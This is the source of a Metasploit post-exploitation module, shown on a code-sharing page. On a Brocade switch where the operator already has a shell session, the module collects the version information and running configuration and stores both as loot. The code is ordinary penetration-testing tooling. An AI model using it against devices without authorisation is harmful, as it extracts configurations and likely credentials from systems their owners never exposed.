Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Brocade
8
  include Msf::Exploit::Deprecated
9
  moved_from 'post/brocade/gather/enum_brocade'
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Brocade Gather Device General Information',
16
        'Description' => %q{
17
          This module collects Brocade device information and configuration.
18
          This module has been tested against an icx6430 running 08.0.20T311.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'h00die'],
22
        'Platform' => [ 'brocade'],
23
        'SessionTypes' => [ 'shell' ]
24
      )
25
    )
26
  end
27

28
  def run
29
    # Get device prompt
30
    prompt = session.shell_command("\n")
31

32
    if prompt.end_with?('(config)#') # config shell
33
      vprint_status('In a config cli')
34
      session.shell_write("skip-page-display\n")
35
      session.shell_write("terminal length 0\n")
36
    elsif prompt.end_with?('#') # regular cli shell (non-config)
37
      vprint_status('In an enabled cli')
38
      session.shell_write("skip-page-display\n")
39
      session.shell_write("terminal length 0\n")
40
    elsif prompt.end_with?('>') # cli not enabled
41
      vprint_status('In a non-enabled cli')
42
    end
43

44
    # attempt to disable paging, cli not enabled this will fail anyways
45
    session.shell_write("skip-page-display\n")
46
    session.shell_write("terminal length 0\n")
47

48
    # Get version info
49
    print_status('Getting version information')
50
    version_out = session.shell_command("show version\n")
51
    if /^, Version: (?<ver>.+) | SW: Version (?<ver>.+) /i =~ version_out
52
      vprint_status("OS: #{ver}")
53
    end
54

55
    ver_loc = store_loot('brocade.version',
56
                         'text/plain',
57
                         session,
58
                         version_out.strip,
59
                         'version.txt',
60
                         'Brocade Version')
61

62
    # Print the version of VERBOSE set to true.
63
    vprint_good("Version information stored in to loot #{ver_loc}")
64

65
    # run additional information gathering
66
    enum_configs(prompt)
67
  end
68

69
  # run commands found in exec mode under privilege 1
70
  def enum_configs(prompt)
71
    host = session.session_host
72
    port = session.session_port
73
    exec_commands = [
74
      {
75
        'cmd' => 'show configuration',
76
        'fn' => 'get_config',
77
        'desc' => 'Get Device Config on Brocade Device'
78
      },
79
    ]
80
    exec_commands.each do |ec|
81
      command = ec['cmd']
82
      cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')
83
      print_status("Gathering info from #{command}")
84
      # detect if we're in pagination and get as much data as possible
85
      if cmd_out.include?('--More--')
86
        cmd_out += session.shell_command(" \n" * 20) # 20 pages *should* be enough
87
      end
88
      if ec['fn'] == 'get_config'
89
        brocade_config_eater(host, port, cmd_out.strip)
90
      else
91
        cmd_loc = store_loot("brocade.#{ec['fn']}",
92
                             'text/plain',
93
                             session,
94
                             cmd_out.strip,
95
                             "#{ec['fn']}.txt",
96
                             ec['desc'])
97
        vprint_good("Saving to #{cmd_loc}")
98
      end
99
    end
100
  end
101
end
102

103